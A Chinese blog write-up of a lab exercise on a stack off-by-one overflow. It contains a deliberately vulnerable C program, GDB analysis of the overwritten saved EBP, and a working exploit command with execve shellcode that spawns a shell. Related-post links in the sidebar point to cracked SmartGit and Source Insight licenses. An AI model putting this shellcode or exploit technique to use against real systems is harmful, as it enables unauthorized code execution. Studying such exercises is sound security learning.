pediy18-3

最新推荐文章于 2021-03-04 22:43:04 发布
最新推荐文章于 2021-03-04 22:43:04 发布
阅读量219 收藏
点赞数
分类专栏: pediy
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38025365/article/details/88708996
版权

Off-By-One 漏洞(基于栈)

将源字符串复制到目标缓冲区可能会导致off-by-one

1.源字符串的长度等于缓冲区的长度。因为字符串的结尾会有一个\00。会溢出到目标缓冲区的上方。如果EBP恰好位于该缓冲区上方,则可导致任意代码执行。

漏洞源代码:

//vuln.c
#include <stdio.h>
#include <string.h>

void foo(char* arg);
void bar(char* arg);

void foo(char* arg) {
 bar(arg); /* [1] */
}

void bar(char* arg) {
 char buf[256];
 strcpy(buf, arg); /* [2] */
}

int main(int argc, char *argv[]) {
 if(strlen(argv[1])>256) { /* [3] */
  printf("Attempted Buffer Overflow\n");
  fflush(stdout);
  return -1;
 }
 foo(argv[1]); /* [4] */
 return 0;
}

上述漏洞的2处可能发生off-by-one。目标缓冲区的长度为256,因此长度为256字节的字符串可能导致任意代码执行。

通过观察堆栈布局

作者已经给出,这里的EBP末尾的一位58被淹没为00,从而导致EBP下降0x58位,即返回地址下降0x58位,导致了任意代码的执行。

进行测试:

首先输入256个"A"进行测试,可以看到返回地址为"AAAA",可以证实返回地址确实被修改了。

接下来寻找返回地址的具体位置。

在IDA里查看到执行完strcpy函数后的地址,为0x8048490。在该处下断点

可以看到EBP原本为0xffffce24,执行完后变为0xfffce00

执行前

执行后

所以下降了0x24位。

这里做一些补充的说明

leave 指令 mov esp,ebp    pop ebp

ret 指令 pop eip

所以在bar函数中并没有影响到什么,只是将foo函数的ebp值减少了0x24。在foo函数的ret处下断点便于观察。

使用了一个比较笨的方法,每次调整A与C的数量,然后在此处观察堆栈,直至BBBB在栈顶。最终找到 "A"*204+"B"*4+"C"*48。"BBBB"即为返回地址,此时便可以利用漏洞执行任意代码。

(为了确保最后的EXP正确,我将环境换成了i386的ubuntu。不然真的很麻烦)

注意:原文提供的shellcode在我的环境下运行会出现问题,我选择使用新的shellcode。直接附加运行代码在GDB的试试即可

尤其注意 shellcode不要放在离esp很近的地方,避免出现问题!! 调整

r `python -c 'print "\x90"*106+"\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80\x90\x90\x90\x90"+"\x90"*70+"\xa0\xf0\xff\xbf"+"C"*48'

最终运行结果。欢迎交流!

 

Wwoc
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
spy++(强大的捕获窗口句柄软件)
04-05
spy++ spy++ spy++ spy++ spy++
脱壳之Pediy未知加密壳
Nattevak
12-29 475
一、简单分析 1.大致浏览寻找OEP地址,填充IAT的地址,获取API的地址,初步编写通用脚本 ①OEP ②填充IAT地址 ③获取API地址 将地址填入脚本,进行测试 // 1.定义变量 MOV dwOEP,0047148B MOV dwGetAPI,001E1914 MOV dwWriteIAT,001E0897 // 2. 清除环境 BC // 清除所有软件断点 BPHWC // 清除所有硬件断点 BPMC // 清除内存断点 // 3. 设置断点 BPHWS dwOEP,
为OllyIce增加附加隐藏进程的功能----PeDiy入门教程
hbiao的博客
10-25 1291
最近学习脱壳,喜欢上了Attach法到OEP,这样有很多好处,但是局限性也很大,例如隐藏进程。有留意过一些手动查杀木马的朋友一定有看过使用Ntsd –P PID Q命令关进程的文章,Ntsd其实就是系统附带的调试器。手上有一个旧版的灰鸽子,Ring 3下的RootKit,加载之后便DLL注入Explorer,并把该进程隐藏。经IceSword查得Explorer的Pid后,能顺利用Ntsd把该进程
脱壳—— pediy 加密壳(含OllySubScript脚本编写)
weixin_42636579的博客
03-04 2055
脱壳——pediy 加密壳寻找OEPIAT 加密问题编写脚本(OllySubScript 编写)脚本思路解决基址问题 关于程序连接: ,,,火绒爆毒,就不传程序链接了,,, 寻找OEP 首先(PEiD)查看下链接器版本 VC 6.0? 使用 OD 打开,发现 pushad/pushfd(妥妥的 ESP定律 呀) F9 运行后断下,再 F7 单步,发现 jmp 到远处 进入,发现 sub esp, 0x58 ,又因为根据链接器版本,猜测是 VC6.0,所以进入第一个 call 验证
si4.pediy.lic
05-23
si4.pediy.lic
SmartGitV18.x破解(非重置试用期)
04-11
使用详情参见:https://bbs.pediy.com/thread-248786.htm 支持18.2.5/18.2.6/18.2.7 具体用法见上述地址(注意:鉴于伸手党太多而且还脾气臭,不会用请出门右转谢谢) 声明 仅供学习研究,请于下载后24h内删除
sourceInsight_4.0.0087 破解版 + 漂亮theme
10-28
3. 导入授权文件(Import a new license file):si4.pediy.lic Patched sourceinsight4.exe: Size Date Time Checksum Name --------- ---------- ----- -------- ---- 2874352 2017-10-17 17:56 EE093E4C source...
基于winpcap发送数据包
04-09
时 间: 2009-05-18,16:55:36 链 接: http://bbs.pediy.com/showthread.php?t=89175 【文章标题】: 基于WinPCap的网络协议开发 - 炮王(超级打炮机)发送数据包(03) 【文章作者】: 加百力 【软件名称】: WinPCap ...
各种编程书下载地址
01-02
#### 3. **Windows̵ڶ.pdf** - **知识点**:可能是关于Windows操作系统的一个教程或指南,可能包括了操作系统的安装、配置、管理等方面的知识。 - **应用场景**:适用于系统管理员、技术支持人员等。 #### 4. **VB...
各种反调试技术原理与实例
04-18
18. EnableWindow禁用窗口 23 19. ThreadHideFromDebugger 24 20. Disabling Breakpoints禁用硬件断点 26 21. OllyDbg:OutputDebugString() Format String Bug 27 22. TLS Callbacks 27 反反调试技术 31
PEDIY软件的加密技术文章提到的一些工具,珍藏多年了
01-29
PEDIY软件的加密技术文章提到的一些工具,珍藏多年了
自写反汇编引擎(二)
qq_41861225的博客
04-02 1535
自写反汇编引擎(二) 资料: 1.intel指令格式与长度反汇编引擎ADE32分析(https://bbs.pediy.com/thread-54180.htm) 2.编写自己的反汇编引擎(https://bbs.pediy.com/thread-128411.htm) 在上一篇文章中我们已经讲解来看一下基础的IA-32指令,那么在这篇文章我们将具体来实现反汇编引擎的编写,首先上效果图(只是完成了...
一次PEDIY---修改Windows自带的calc.exe (Unable to read memory of debugged process......”错误提示)
kendyhj9999的专栏
12-30 3299
标 题: 【原创】一次PEDIY---修改Windows自带的calc.exe 作 者: stalker 时 间: 2008-07-08,11:06:15 链 接: http://bbs.pediy.com/showthread.php?t=68066 【文章标题】: 一次PEDIY---修改Windows自带的calc.exe 【文章作者】: stalker 【作者邮箱】: zh
SEH——Structured Exception Handling(结构化异常处理)
dayenglish的专栏
03-01 1689
SEH是windows操作系统处理程序错误或异常的技术。SEH是一种系统体制,与具体的程序设计语言无关,但是windows下的编译器多使用SEH实现异常处理。     系统级别的SEH比较好理解,利用fs:[0]处保存的异常处理回到函数链表对异常进行处理。从这里也可以看出异常是和线程相关的。因为fs:[0]指向的位置是TEB而TEB所包含的的TIB的第一个成员是EXCEPTION_REGISTR
pediy2016 CM2
40KO的博客
02-24 252
整个程序大致流程:(所有重要字符串都已经过RC6解密处理,达到加密的效果) 解密出fnGetRegSnToVerify和fnCalcUserInputRegSnAfterEnc两个函数名并注册为lua函数 获取输入并进行RC6解密处理 解密出lua编译后的脚本并执行该脚本 在该脚本中调用了fnGetRegSnToVerify和fnCalcUserInputRegSnAfterEnc函数 ...
SEH反调试的实现与调试
热门推荐
小驹的专栏
05-16 1万+
SEH用于反调试或者用于注册码的隐藏时。在没有异常时永远都是错误的注册码,只有当触发异常时,程序才走到注册成功的地方…… 代码如下: void CSehDlg::RegSuc() { HWND hWnd = ::GetDlgItem(NULL, IDC_STC_TIP); ::SetWindowText(hWnd, "Success!!"); } void CSehDlg::RegFai
对于结构化异常处理(SEH)的进一步探索
Victor 的专栏
12-31 1591
写本文的起因 Matt Pietrek 关于结构化异常处理的文章 A Crash Course on the Depths of Win32 Structured Exception Handling 是一篇很棒的文章(在本文末的“相关文章”中有我整理过的中文版文章链接),对于我了解 Win32 下的这种异常处理机制帮助很大。在仔细读完整篇文章、跟踪过相关代码的执行流程后,仍有意犹未尽的感觉。本文
pediy18-4
WocW的博客
03-23 214
使用 return-to-libc 绕过 NX 位 与之前做的基本rop基本相同,但是由于是课程作业,得做一下 漏洞程序代码 //vuln.c #include <stdio.h> #include <string.h> int main(int argc, char* argv[]) { char buf[256]; /* [1] */ strcpy(bu...
Linux Exploit系列之四 使用return-to-libc绕过NX bit
weixin_30561177的博客
05-05 158
使用return-to-libc绕过NX bit 原文地址:https://bbs.pediy.com/thread-216956.htm 这篇讲解的比较好,主要的问题是获得system地址和exit函数地址,这两个地址除了作者说的可以使用libc的基地址计算外,还可以在gdb中查看 (gdb) b main (gdb) r `python print' "A"*268 '` (gd...
sourceinsight4的si4.pediy.lic文件是?
最新发布
12-29
sourceinsight4的si4.pediy.lic文件是Source Insight4软件的授权文件。在安装Source Insight4时,用户需要获得一份有效的授权文件,即si4.pediy.lic文件。该文件包含了软件使用的许可证信息,包括用户的注册信息和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值